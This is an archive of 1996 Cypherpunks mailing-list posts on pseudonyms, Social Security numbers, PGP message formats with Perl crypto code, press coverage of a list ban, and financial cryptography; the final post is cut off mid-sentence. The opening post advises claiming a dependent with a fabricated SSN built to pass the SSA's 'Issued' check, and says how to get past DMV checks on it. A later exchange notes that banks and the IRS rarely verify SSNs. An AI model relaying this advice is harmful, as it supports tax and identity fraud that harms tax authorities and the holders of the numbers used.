> The fact is, hundreds of millions of names are obviously--and almost
> unavoidably--in the mundane public sector. I say "almost unavoidably"
> because driver's licenses and social security numbers are ubiquitous.
> 
> (Side note: Jim McCoy's suggestion that kids can be kept off the
> parental-unit's tax returns and thus not get a SS number is fraught with
> problems. Many schools--including public schools--use the SS number for
> various internal and tracking reasons. Even if the kid is free of SS
> numbers until he's a teenager--at a cost of thousands of dollars a year in
> IRS deductions not taken--he'll essentially have to have an SS number in
> his high school years, for a variety of reasons. Maybe this can be avoided,
> but I doubt the reward is worth the hassles.)

Personally, I suggest that the dependent be identified with an erronious
SSN number.  If the dependent exists it is hard to make a fraud case and
the deductions are usually allowed anyhow.

I'm not sure what "a variety of reasons" in the highschool years is.  As
for hastles, I can't think of what they might be, other than going to the
SSN web page to construct a properly formatted number which the SSA will
report as "Issued" (as opposed to "Unissued").  This is one of the few
pieces of information that is given out.

Again, DMVs cannot check to see that the number matches the name, only if
it was issued and if the first three digits correspond to location where
the number was supposedly "issued" from.  (If not one can always claim to
have lived in the state that DID issue that number).

> The second category is that of the political domain. If a person can
> separate himself from the comments he makes, as Alois^H^H^H^H^H Black
> Unicorn has done, then it hardly matters--in an important sense--that his
> True Name has a SS number on file somewhere.

I disagree.
The lack of a social security number makes the first part easier.  They
are most certainly connected in the research into the few clues that will
have to slip out, will not lead back to any fact which can be later used
to narrow down the field.  (The first three numbers of a SSN for example).

> This is an important distinction in discussing privacy, I think. If I had a
> rug rat, I doubt I'd go to great lengths to avoid getting him or her an SS
> number. If the Feds offered me a yearly savings of $1000 or more on my
> taxes, I'd take it.

Pity, but still, you can avoid it without sacrificing the dependent
deduction.

> (Given that it's almost an inevitability that the kid would have to "enter
> the system" at about the age where it really begins to matter, e.g, the age
> at which he or she begins to have political beliefs.)

I don't understand why this is so.  Perhaps I missed a link in the chain
here?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Wed, 13 Nov 1996 16:00:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Getting attention the old-fashioned way
In-Reply-To: <v03007808aead2c1a14b4@[207.167.93.63]>
Message-ID: <328A6112.3BB6@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


C Matthew Curtin wrote:
> 
> >>>>> "Tim" == Timothy C May <tcmay@got.net> writes:
> 
> Tim> Sad that journalists cater to this kind of thing. I guess
> Tim> "personality pieces" are ever so much more popular than technical
> Tim> pieces, or even careful explications of things like crypto
> Tim> anarchy and the real implications of the tecnologies we are
> Tim> involved with.
> 
> Sad, yes; surprising, no. It's been my experience that such things are
> often dependant on the journalist's audience (i.e., is it a trade rag
> like InfoWorld or the National Enquirier?)

Or for that matter, the Netly News,
http://pathfinder.com/Netly/daily/961112.html

> In any event, journalists
> (and/or their publishers) aren't usually noted for doing things that
> are interesting or important. Rather, they seem to have a preference
> for writing and publishing what will sell. (Just as is the case with
> TV talk shows, etc.)
> 
> What's worrysome is that the degenerates who concern themselves with
> nonsense are numerous enough to make sufficient demand to keep the
> mainstream press focused on such trivial matters, allowing more
> significant things to go unreported outside of the small circles from
> which they've originated.

I couldn't agree more.

Maybe I should have helped Lewis Koch out. At least he isn't a fucking 
hypocrite.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 13 Nov 1996 14:35:33 -0800 (PST)
To: gary@systemics.com
Subject: Re: pgp3
In-Reply-To: <199611131217.NAA19213@internal-mail.systemics.com>
Message-ID: <199611131606.QAA00513@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Gary Howland <gary@systemics.com> writes:
> Raph Levien <raph@cs.berkeley.edu> writes:
> [...]
> > Nope. This RFC is merely a rehash of the pgformat.doc file in the PGP
> > 2.6.? distribution. I'm doing an independent implementation of the PGP
> > 2.6 message formats, and found this document unclear in a few spots. For
> > example, can anyone else figure out the weird CFB variant mode from this
> > document? I used a debugger on the PGP code to help me figure it out.
> 
> Exactly - I spent ages on the same thing.  Then there's the problem that
> packet length headers must be specific lengths for various types (eg.
> key certificates must have a 2 byte length, even if only one is required).
> It is also not clear what the exported key certificates should contain,
> the spec simply mentioning that there should be no trust packets etc. etc.
> 
> > The PGP 3.0 "spec" that you're referring to is actually a draft for a
> > PGP library API. A couple of those got circulated on some PGP mailing
> > lists, but none have been publicly released, another example of the
> > secrecy surrounding the whole PGP effort.
> >
> > Now that PGP Inc. is happening, it's not exactly clear whether the PGP
> > 3.0 release is going to include an API closely resembling these drafts.
> 
> I agree with your comments.  For example, we are developing PGP compatible
> libraries in both Perl and Java, and are going to add SHA, Blowfish, T-DES,
> etc.,

I guess you've seen Zbig Fiedorowicz's unofficial SHA-1 patch.  Yet I
am not sure that what Zbig has will remain compatible with PGP3.  The
RFC document says that hashes can be added.  Zbig just chose the next
integer, which seems likely.  The padding to use in RSA signatures
seems less likely that it will be compatible.  Zbigs SHA-1 padding is
described in his docs as being:

+ #ifdef SHA1
+ static byte sha1_asn_array[] = {      
+       0x30,0x21,0x30,0x09,0x06,0x05,0x2b,0x0e,0x03,0x02,0x1a,
+       0x05,0x00,0x04,0x14 };
+ /*
+ Taken from Internet Draft draft-ietf-cat-spkmgss-06,
+ "The Simple Public-Key GSS-API Mechanism (SPKM)", by
+ C. Adams, Bell-Northern Research, Jan. 19, 1996.  See
+ also "Working Implementation Agreements for Open Systems
+ Interconnection Protocols: Part 12 - OS Security, Output
+ from  the   December  1994   Open  Systems   Environment
+ Implementors' Workshop (OIW)" 
+ 
+          SHA1 OBJECT IDENTIFIER ::= {
+             iso(1) identified-organization(3) oiw(14) secsig(3) 
+             algorithm(2) 26 
+          }
+ ASN.1 encoding:
+   0x30, / * Universal, Constructed, Sequence * /
+         0x21, / * Length 33 (bytes following) * /
+                 0x30, / * Universal, Constructed, Sequence * /
+                 0x09, / * Length 9 * /
+                         0x06, / * Universal, Primitive, object-identifier * /
+                         0x05, / * Length 5 * /
+                                 43, / * 43 = ISO(1)*40 + 3 * /
+                                 14,
+                                 3,
+                                 2,
+                                 26,
+                         0x05, / * Universal, Primitive, NULL * /
+                         0x00, / * Length 0 * /
+                 0x04, / * Universal, Primitive, Octet string * /
+                 0x14 / * Length 20 * /
+                         / * 20 SHA.1 digest bytes go here * /

> along with a better key ring format, encrypted key rings, and
> features such as key generation from a passphrase, and we would very
> much like to remain compatible with the new PGP, but how can we when
> there is so little information available?  I think we need a forum
> to discuss PGP development issues - I would be happy to set one up
> if there was interest.

encrypted key rings are a Good Idea.  I think PGP3 does this, so I
guess you are interested in doing it in a compatible way.  (premail
provides a `secrets' file.  I think it would be useful to generalise
this facility so that other programs could use this facility.) 

Adam

ps I also picked apart the weird IDEA cfb, (using the code, and not the
docs), for this:

$n=($m=4**8)+1;sub M{$_[0]%=$m}sub N{$_[0]=(($z=($K[$o++]||$m)*($_[0]||$m))-$n*
int$z/$n)%$m}sub A{N$A;M$B+=$K[$o++];M$C+=$K[$o++];N$D}sub I{use integer;($x=
pop)<2?$x:0+($v=$n/$x,$y=$n%$x,$u=1,do{$q=$x/$y,$x%=$y,$u+=$q*$v,$q=$y/$x,$y%=
$x,$v+=$q*$u while$y>1&&$x>1},$x<2?$u:$n-$v)}$x=unpack"B*",pack H32,$k;@K=
unpack n52,pack"B*"x7,map{substr$x x7,$_*25,128}0..6;sub E{($A,$B,$C,$D,$o)=
unpack n4,$_[0];map{A;$c=$C;$C^=$A;$b=$B;$B^=$D;M$B+=N$C;M$C+=N$B;$A^=$B;$D^=$C
;$B^=$c;$C^=$b}1..8;A$B^=$C^=$B^=$C;pack n4,$A,$B,$C,$D}$_=<>;if($d){
s/..(.{8})//,$i=$1}else{$i=pack H16,$i;$j=substr$i,6,2;print$i^=E,substr$j^=E(
$i),0,2;$i=~s/../$'$j/}print substr$d?E($i)^($i=$&):($i=E($i)^$&),0,length$&
while s/.{8}|.+//s

(what is it?  PGP compatible CFB mode IDEA, which I (and another perl
hacker) were playing with a while ago, the idea being to do a PGP
compatible minimal script, not very small so far though :-( Combine
that with the already existing 2 lines of RSA in perl/dc (or perhaps 4
lines of RSA in pure perl), another 7 lines of MD5, a bit of keyring
access glue (maybe borrowed from Mark Shoulsen's pgpacket.pl), and
you'd have the ability to access PGP keyrings, with encrypted keys,
and do RSA/IDEA encryption.  You wouldn't be far off RSA signatures
either.  Maybe it would all come out under 2048 characters (a
precondition for a perl most interesting obfuscation contest).  Not
got around to finishing it yet though.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 13:11:13 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611130331.TAA28661@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.94.961113155458.2905D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Vladimir Z. Nuri wrote:

> >I'm sure some clever participant at DCSB will do a pile of homework before
> >coming to my talk and put it all together.  So be it.  If he or she is
> >polite, they might chide me in private a bit, but not blather all over the
> >list just to show how very clever they were.  As long as they enjoy the
> >talk, I'm not overly concerned.
> 
> or then again, maybe they'll sell it to BLACKNET!! <g>
> 
> actually Unicorn, eventually voice analysis software may
> evolve to the point that someone could match people
> based on their voices to public speech databases, and you
> could be nailed through your phone conversations. hmmmm, have you
> ever had a conversation with someone who might have been
> taping you for amusement?

Probably.

> 
> (heh. you write a long, self-indulgent letter about the extremes
> you have gone to keep your ID secret, and pretend to be blase' &
> nonchalant if someone discovers it? I think I can see through
> that smokescreen.)

You didn't read very carefully.  I'd hardly call the modest efforts I made
extreme.  This was the entire point.  If explaining my successes with
moderate efforts so that others might duplicate it (I think that apathy is
why more nyms [like yours] are unsuccessful as privacy tools) then how is
that self-indulgent?

> actually, I heard this interesting rumor that Unicorn threatened
> to sue someone who "defamed" his pseudonym. quite an amusing
> story if true, given his last essay that talks about how he
> created the pseudonym in the first place to avoid exactly what
> it accomplishes, i.e. dissociating his professional identity
> from the "lunatic anarchist" writhing beneath the surface.

You fail to not that dissociating one identity from another requires the
existence of two identities.  Is the second any less entitled to
protection than the first?

> actually, there are some amusing things going on here with cpunk
> "rules." are cpunks in favor of pseudonyms or not? one famous
> cpunk madman wrote under a pseudonym to the list, and many
> cypherpunk went to great lengths to try to derive his identity.
> is this a case of respecting pseudonyms? or is it more a case of
> the double standard at best, hypocrisy at worst, 
> "respect my pseudonyms, but yours are fair game"?  

No.  That is the pseudo-cpunk attitude.

The real cypherpunks attitude can be illustrated thusly:

Two men are walking down a street, a psychologist and an economist.  They
happen along on a $100 bill.  Thinking he will evaluate the response of
the economist, the psychologist ignores the clearly visible bill.  To his
surprise the economist ignores it as well.  On asking the economist why he
did not pick up the bill, the psychologist recieves this answer:

"If it was really a $100 bill, someone would have picked it up already."

An old joke, but it makes an important point.  It is not enough to know
how the market system works, but also to participate it.  This is why I
believe using those legal tools that are available is an important step.
There is no morality other than the morality of the market.  I submit that
we do not need a central authority to dictate morality.  We need only
individual views of morality.  There will only be as large a pornography
market as there is a demand.  Ditto for narcotics, guns.  If the market
believes that porn is immoral, customers, by their own moral decision,
will reduce the market to nothing.  Of course this will not happen
in the near future because the cost of this moral choice exceeds the
benefit for many customers.

Why is use of the legal system any different?  If it is so wrong for me to
use the legal system as it stands, and if I am to be the subject of
criticism for the conduct, then aren't the critics imposing their moral
view on me?  Isn't this what libertarian cypherpunks dislike in the first
place?

The bottom line is that the decision to sue is much like the decision to
use a legal tax loop.  I would call "idiot" the person who refused to
utilize that which the government hands him. (Did not Mr. May indicate
that the $1000.00 or so that the government would hand him was too costly
to lose, even in the face of estlablishing privacy for his children?  In
my view that is a rational decision.  Mr. May has priced privacy.  My
objection to his rationale was that I think the cost of obtaining it can
be significantly lower).

If the government is going to hand me the means to curb conduct which may
be harmful to me, why should I refuse to use it on some "moral" grounds.
(The moral grounds might consist of "well it's not a nice thing to do." 
but other than that, I am at a loss to identify them precisely).

I submit that if law suits are so harmful and create such loss, eventually
they will be eliminated by one of several mechanisms.

Cypherpunks that they might speed the process by using that entitlement
which the government gives them.

[Remaining nonsense deleted]

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 13:16:47 -0800 (PST)
To: Rick Smith <smith@sctc.com>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611122141.PAA27619@shade.sctc.com>
Message-ID: <Pine.SUN.3.94.961113161154.2905E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Rick Smith wrote:

> Hal Finney wrote:
> 
> : Are there other measures which parents could take while their children are
> : young to get them off to a good start, privacy-wise?
> 

[...]

> The basic and obvious rule to most of us is to control the SSN and
> don't give out a correct one except when absolutely necessary.  One of
> the banks in Minneapolis refuses to pay interest at all if you don't
> have your SSN on file.

All banks require this.
Exercise for the reader:  How does the bank verify SSNs?

> Rick.
> smith@sctc.com

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 13:18:13 -0800 (PST)
To: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611130235.SAA14796@toad.com>
Message-ID: <Pine.SUN.3.94.961113161451.2905F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Sean Roach wrote:

> At 10:14 PM 11/11/96 -0600, Igor Chudov wrote:

> >His parents are cypherpunks and did not obtain an SSN for John. How much 
> >effort would it cost him to live a life outlined above?
> 
> He couldn't, at least not in Oklahoma.  In Oklahoma, students in public
> schools are now required to have SSN's.

And these are verified..... how?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Wed, 13 Nov 1996 14:31:40 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Validating SSNs
Message-ID: <v01540b09aeaff516ed6d@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:13 PM 11/13/96, Black Unicorn wrote:

>Exercise for the reader:  How does the bank verify SSNs?

OK, I'll bite.

My guess is that the bank sticks the SSN in a report to the IRS and the
bank is happy with the SSN as long as the IRS doesn't complain about it.

Now, does the IRS check? I suspect that they don't, either. Their objective
is to look for "matches" with SSNs that show up on filed tax forms, since
they want to verify the data on the tax form. Given the behavior of every
other large database I've ever seen, I'd guess that there would be a huge
number of SSNs that don't in fact associate with tax forms. If someone High
Up hasn't decreed that they should chase such things down (and allocated
heaps of money to do it), they'll ignore the mismatches.

This seems consistent with the reports of people who use bogus SSNs for
decades at a time.

Rick.
smith@sctc.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 13 Nov 1996 16:01:32 -0800 (PST)
To: E.J.Koops@kub.nl
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <A81C16F0582@frw3.kub.nl>
Message-ID: <199611131641.QAA00670@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bert-Jaap <E.J.Koops@kub.nl> writes:
> On Fri, 25 Oct 1996 00:32:52 +0100, Adam Back wrote:
> [snip]
> > Also I understand, though there appears to be no available
> > documentation saying as much, that pgp3.0 will not use RSA, nor IDEA,
> > nor MD5, using instead El Gamal for public key encryption and
> > signatures, 3DES (unsure?), and SHA1.
> 
> Can someone confirm that PGP3.0 will use ElGamal?

Note that part of my above post is now in need of revision as a result
of comments I received from that post.  PGP 3.0 will, it seems, still
be able to verify (and maybe even generate too?) RSA signatures, and
decrypt RSA encrytped email.  So the "will not use RSA" above is
incorrect.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul George <george@justice.usdoj.gov>
Date: Wed, 13 Nov 1996 13:44:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Computer Security Training
In-Reply-To: <199611131240.NAA19255@internal-mail.systemics.com>
Message-ID: <Pine.NEB.3.95.961113163245.421A-100000@sneezy.usdoj.gov>
MIME-Version: 1.0
Content-Type: text/plain


I got this on the LAN at work.


>Computer Security Awareness Training (CSAT) will be held at CSS on
>November 21, 1996, from 2:00 p.m. to 3:00 p.m., in the South Computer
>Room.  Our guess speaker will be Mr. Tony Escobedo, an FBI Information
>Security Specialist currently responsible for the FBI Security Education
>Program.  The presentation will satisfy our yearly CSAT requirement for
>CSS employees.  This training is mandatory.

Does anyone know this guy?  Does anyone have any questions that they would
like me to ask?  I could take notes and let you know what he says (if
anything).  

I imagine this guy is going to say things like "Don't leave your computer
logged on while you go to lunch" Duuuhhhh...

I'd like to ask very poignant questions since this will be my second to
the last day working for Uncle Sam. (I'm going Private Industry, yeeaa!!)

And I really don't care what my boss thinks of my questions. ;)

Paul.

Oh, I unsubscribed to the list, 500 emails over a long weekend is too
much.  So please CC: questions to george@justice.usdoj.gov and I will
forward all answers to the list. Thanks a bunch....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 13 Nov 1996 07:48:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: PGP3.0 & ElGamal
Message-ID: <A81C16F0582@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 25 Oct 1996 00:32:52 +0100, Adam Back wrote:
[snip]
> Also I understand, though there appears to be no available
> documentation saying as much, that pgp3.0 will not use RSA, nor IDEA,
> nor MD5, using instead El Gamal for public key encryption and
> signatures, 3DES (unsure?), and SHA1.

Can someone confirm that PGP3.0 will use ElGamal?

Bert-Jaap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Wed, 13 Nov 1996 16:51:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.SUN.3.91.961113103859.18273A-100000@eff.org>
Message-ID: <328A6CE3.7EB@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> 
> If Vulis thinks I did an "excellent job," then perhaps I should have
> criticized him more harshly.

No, you should have ignored the story, because there wasn't one. It's 
quite rich that your story criticizes journalists for doing exactly what 
you did: give Vulis far more attention than he deserves. In case you've 
forgotten what you wrote:

                 What does Vulis's ouster
               mean to the community that
               sprang up around this mailing
               list, of which he had been a
               member for nearly three
               years? Many of his peers think
               he did it for attention or
               notoriety; one longtime
               list-denizen declined to be
               interviewed for fear of
               encouraging him. (If that's his
               goal, he's already succeeded.
               Will Rodger from Inter@ctive
               Week and Lewis Koch from
               Upside Magazine are writing
               about this.) 

As much as I'm tempted, I believe no further comment is necessary.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Nov 1996 13:51:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Rush on Anonymity
Message-ID: <3.0b36.32.19961113164933.007597b4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Rush Limbaugh opined that most of the BS on the Nets would disappear if Net
IDs could be easily traced.  (He was observing not advocating.)

I know this isn't correct.  Most of those who post do so under their own or
easily traceable identities.  Most of what is posted is "as legal as church
on a Sunday" in any case.  Many posters are judgment proof student types as
well.  

The net is the equivalent of barroom conversation or other casual
conversation between individuals.  The only difference is more people can
overhear.  In addition, speakers are likely to get a bit more rambunctious
because they are not in the physical presence of others and so are less
likely to be intimidated in monkey-troop fashion.  No deference need be
given to those higher on the pecking order because those primitive
responses are keyed to physical presence.

The Net is an approximation of a stream of consciousness since many posters
don't think before they post.  That's not illegal, however.  If the Fibbies
knew who posted the Friendly Fire message about TWA 800 (how many megabytes
of such messages have there actually been?), it would make no difference
since such claims are legal. 

The Net is just what you get when communications barriers and physical
intimidation are reduced.  It isn't even very "nasty, brutish, and short."
I've posted controversial opinions for years and have hardly been flamed
once.  All those reporters who get on the Nets and immediately get flamed
must either be hanging out in the wrong places or be pretty stupid in the
way they say things.  

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 13 Nov 1996 15:07:47 -0800 (PST)
To: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611132053.MAA05389@toad.com>
Message-ID: <9611132307.AA00578@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Sean Roach writes:
>  Cypherpunks try to break each others crypto as well, in an
>  attempt to evolve crypto to the point that it is not crackable.

I would like to chime in and say that this point will never be reached.  Each  
revision of software potentially contains new chinks in the armor.  Eternal  
Vigilance is not only the price of freedom, but security as well.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 13 Nov 1996 16:05:26 -0800 (PST)
To: unicorn@schloss.li
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <Pine.SUN.3.94.961113155458.2905D-100000@polaris>
Message-ID: <199611131722.RAA00682@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn <unicorn@schloss.li> writes:
> Vald Nuri <vznuri@netcom.com> writes:
> > actually, I heard this interesting rumor that Unicorn threatened
> > to sue someone who "defamed" his pseudonym. quite an amusing
> > story if true, given his last essay that talks about how he
> > created the pseudonym in the first place to avoid exactly what
> > it accomplishes, i.e. dissociating his professional identity
> > from the "lunatic anarchist" writhing beneath the surface.
> 
> You fail to not that dissociating one identity from another requires the
> existence of two identities.  Is the second any less entitled to
> protection than the first?
> 
> [...]
>
> There is no morality other than the morality of the market.  I submit that
> we do not need a central authority to dictate morality.  We need only
> individual views of morality.  There will only be as large a pornography
> market as there is a demand.  Ditto for narcotics, guns.  If the market
> believes that porn is immoral, customers, by their own moral decision,
> will reduce the market to nothing.  Of course this will not happen
> in the near future because the cost of this moral choice exceeds the
> benefit for many customers.
> 
> Why is use of the legal system any different?  If it is so wrong for me to
> use the legal system as it stands, and if I am to be the subject of
> criticism for the conduct, then aren't the critics imposing their moral
> view on me?  Isn't this what libertarian cypherpunks dislike in the first
> place?

The problem for me when people talk about suing people for slander in
net discussions is that it involves governments and laws impinging on
the internet.  Other examples of legislation interacting with the
internet have been entirely negative: some people have called for
legislation to stop "spamming", legislation to restrict pornography,
"indecent speech", etc, etc The internet in my view is best off with
the least possible government or legal interference.

It is difficult to see ways for you to stop people intentionally
damaging your nym's reputation capital however.  Aside from the more
speech to fight the speech, you are left with the reputation capital
mechanisms.

If someone with a low reputation slanders someone with a high
reputation, this reduces the impact of the slander, and clueful
readers one presumes regard the derogatory statements on the part of
the slanderer as suspect.

However this still leaves the less clueful (the newbies to a
discussion group for instance), and also the chance that others are
still slightly affected by these statements.

Something else I might suggest, if a nym becomes too valuable to risk
using for posting to flame prone discussion groups, perhaps a lower
value nym could be used in such discussions.  This has disadvantages,
in that you have to start over building reputation capital, and so
forth.  But such is life.  You have another nym which you used for the
DCSB talk, and one presumes other ones for use in real world business.
You use nyms accordingly.

> If the government is going to hand me the means to curb conduct which may
> be harmful to me, why should I refuse to use it on some "moral" grounds.
> (The moral grounds might consist of "well it's not a nice thing to do." 
> but other than that, I am at a loss to identify them precisely).

There are plenty of people with a wont to sue people for all sorts of
things.  Many of them would do so on much less grounds than perhaps
you might.  Some get pretty groundless, in fact.  Colin James III
being one example.  (Erk, may be I ought to be using a nym here, I
hear he scans newsgroups, but hopefully not mailing lists)

It stifles discussion to bring real monetary threats behind peoples
words.  It is also in some sense a call to outside authority,
something which I resent.  For instance many of the people CJ III has
harrased from my reading have suffered considerable inconvenience.  No
need to mention a certain pseudo-religious organisation which has made
extensive use of law suits for the purpose of harrassing it's
dissenters.

Now I'm sure the idea of slander law suits is to stop the slander,
recompense for damages etc. but it is a thing prone to misuse, and
balanced in favour of those with money.

Someone who is using a nym, and for purposes including avoiding the
possibility of frivolous law suits, to suggest suing someone who
slanders this nym is not that productive I think.  The slanderer may
also adopt the same strategy, and adopt their own nym!  

Nym sues nym.  I think not.  An alternate view of slander law suits is
as a way to encourage the use of Nyms.  Certainly the dissenters of
the unnamed pseudo religious have learnt the value of nyms, remailers
and so forth.  There are distinct advantages to nyms.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Wed, 13 Nov 1996 17:44:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961113061359.725B-100000@well.com>
Message-ID: <328A7AEB.4C6D@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> 
> On Tue, 12 Nov 1996, Bill Frantz wrote:
> > There is a serious error here.  Gilmore did nothing to prevent Vulis 
> > from posting to the list.  He only prevented Vulis from receiving 
> > the list under his own name.  And, the as hominem attacks continue.[...]
> The point I was trying to make at the end and that I may not have done
> very successfully is that it would be very difficult to prevent Vulis 
> from *posting* to the list under his name; he then could do it through
> remailers. And blocking remailers is unacceptable. So how does one 
> kick someone else out of a forum where anonymous speech is allowed?

Simple. Filter by content without admitting that you are doing so. Libel 
people. Suppress discussion.

In short, do precisely the opposite of what Gilmore has done.

I had been assuming, incorrectly, that the fight-censorship list was 
still down because of the hard drive crash on vorlon. As a matter of 
fact, I see that volume 2, issue 4 of the fight-censorship digest 
contains a message from me, though without credit.

If you have a problem with the below, please discuss the matter 
publicly, as Gilmore has discussed Vulis publicly.

|>>>> subscribe fight-censorship
|Your request to Majordomo@vorlon.mit.edu:
|
|        subscribe fight-censorship Richard Charles Graves 
|<llurch@networking.stanford.edu>
|
|has been forwarded to the owner of the "fight-censorship" list for 
|approval.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 13 Nov 1996 15:01:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Financial Cryptography and the Theory of International Relations
Message-ID: <v03007877aeb00162ae5b@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Wed, 13 Nov 1996 15:32:34 -0500
From: Robert Hettinga <rah@shipwright.com>
Subject: Financial Cryptography and the Theory of International Relations
X-Sender: rah@pop.tiac.net
To: IRTHEORY_LIST <irtheory_list@unimelb.edu.au>
MIME-version: 1.0

Somebody asked me, regarding my posting here of the Digital Commerce
Society of Boston meeting announcement (DCSB: Money Laundering -- The
Headless Horseman of the Infocalypse):

>Yes, I would like you to explain.  Just what does this have to do with the
>theory of international relations?

People like the attorney "Black Unicorn" are interested in the
international application of the technology of strong cryptography; in
particular, strong financial cryptography. See <http://www.vmeng.com/rah/>,
for pointers to more information on this, which I include here by reference.

The short answer is, what happens if nation states can't fund themselves
anymore because the cheapest transaction method available (cheaper by
several orders of magnitude in lowered transaction and distribution costs)
involves anonymous digital "cash" settlement?  To quote something someone
said in a Harvard Law seminar list a couple of years ago, "What happens
when taxes become a tip?".

The strongest financial cryptography protocols (like those invented by
David Chaum of Digicash, or Mark Manasse of DEC, or Adi Shamir of RSA) use
no book-entries whatsoever, which means no audit trails, which in turn
means no book-entry taxes, like, say, those on income, or capital gains, or
sales.

In addition, what happens when we can effect the sale of financial assets
with the digital equivalent of old-fashioned bearer certificates, which use
the same cryptographic technology? The centralization of capital markets
may become a thing of the past. Centralized markets for *anything* may
become a thing of the past.  The nation-state's ability to reallocate
income, criminally, ala Amin or Mobutu, or otherwise, is severely limited
in this scenario, certainly. :-).


With anonymous voting protocols, you can have anonymous (or, more
correctly, perfectly pseudonymous) control of financial assets. Possible
damage to one's reputation (pseudonymous or not) works just fine to prevent
the non-repudiation of cash-settled transactions, so the power of nation
states aren't even necessary to regulate commerce, really. The only thing
left that nation states do is physical security, or the "rational"
application of force, which can probably be handled privately, particularly
if nation states can't command the payment of taxes for this service anyway.

Which brings me to the current discussion here about the imploding
pseudo-states of Africa. What we're witnessing right now is the
re-emergence of tribal groups as the common political denominator. Nation
states based on those groups are likely. However, I also expect that this
process of literal dis-integration will continue, but recursively, as it
becomes more and more possible for ordinary people to use information (like
asset pricing, the returns on those assets, or the technical knowlege to
